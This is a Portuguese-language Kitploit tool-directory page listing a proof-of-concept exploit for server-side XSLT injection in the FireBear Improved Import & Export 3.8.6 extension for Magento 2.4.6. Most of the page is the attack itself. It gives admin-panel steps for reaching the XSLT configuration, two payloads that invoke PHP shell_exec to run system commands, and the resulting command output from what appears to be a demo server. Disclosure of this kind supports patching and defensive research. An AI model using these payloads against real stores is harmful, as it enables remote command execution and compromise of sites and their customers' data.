Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Magento-ver.-2.4.6 — Magento ver. 2.4.6 - XSLT Server Side Injection | Kitploit
Ferramentas/GitHubGitHub/capture0x/magento-ver.-2.4.6
Vulnerability AnalysisExploitationWeb Application ExploitationPayload Development
GitHubcapture0x/magento-ver.-2.4.6

Magento-ver.-2.4.6

Magento ver. 2.4.6 - XSLT Server Side Injection

Ver Repositório
4há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Título do Exploit: FireBear Studio Improved Import & Export ver. 3.8.6 para Magento 2.4.6 - Injeção XSLT do Lado do Servidor

  • Data: 2023-11-17
  • Autor do Exploit: tmrswrr
  • Página inicial do fornecedor: FireBear Studio
  • Link do software: FireBear Studio Improved Import & Export
  • Versão: FireBear Improved Import & Export ver. 3.8.6
Imagem do Magento Imagem do Magento ## POC
  1. Acesse este URL com credenciais de administrador: https://magento2demo.firebearstudio.com/
  2. Clique em SYSTEM > Import Jobs > Entity Type Widget > click edit
  3. Escolha Import File Type > XML > Import Source is File
  4. Envie qualquer arquivo xml
  5. Clique em XSLT Configuration e escreva este payload:
root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
    <xsl:value-of select="php:function('shell_exec','id')" />
  </xsl:template>
</xsl:stylesheet>```
   
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','ls')" />
     </xsl:template>
   </xsl:stylesheet>```

**<?xml version="1.0"?>
cron.php
errors
get.php
health_check.php
index.php
media
opt
robots.txt
static
static.php
Baixar ferramenta